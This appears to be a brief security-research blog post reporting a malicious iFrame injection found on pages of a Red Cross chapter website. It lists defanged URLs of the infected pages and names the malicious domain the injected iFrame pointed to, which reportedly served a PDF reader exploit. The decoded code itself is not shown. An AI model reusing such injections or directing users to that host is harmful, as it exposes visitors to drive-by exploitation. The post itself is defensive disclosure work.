In this morning's logs I noticed that Zscaler detected malicious content within redcross-esc.org web-pages. Turns out that the site was a victim of a malicious iFrame injection, and I thought a short post on this would be a good follow-up from Umesh's previous post on hidden malicious iFrames.
redcross-esc.org belongs to the American Red Cross East Shoreline Chapter and is hosted on GoDaddy. Pages infected include:
- hxxp://www.redcross-esc.org/gethelp/index.html
- hxxp://www.redcross-esc.org/getinvolved/index.html
- hxxp://www.redcross-esc.org/givemoney/index.html
Screenshot of malicious iFrame:
First stage decode:
Final decode writes iFrame to hxxp://foxionserl.com/:
Fortunately the foxionserl.com domain is not currently resolving, so the malicious page is not being pulled - Google results show that it had hosted a Adobe Acrobat PDF Reader exploit. Notifications are being sent to Redcross and GoDaddy.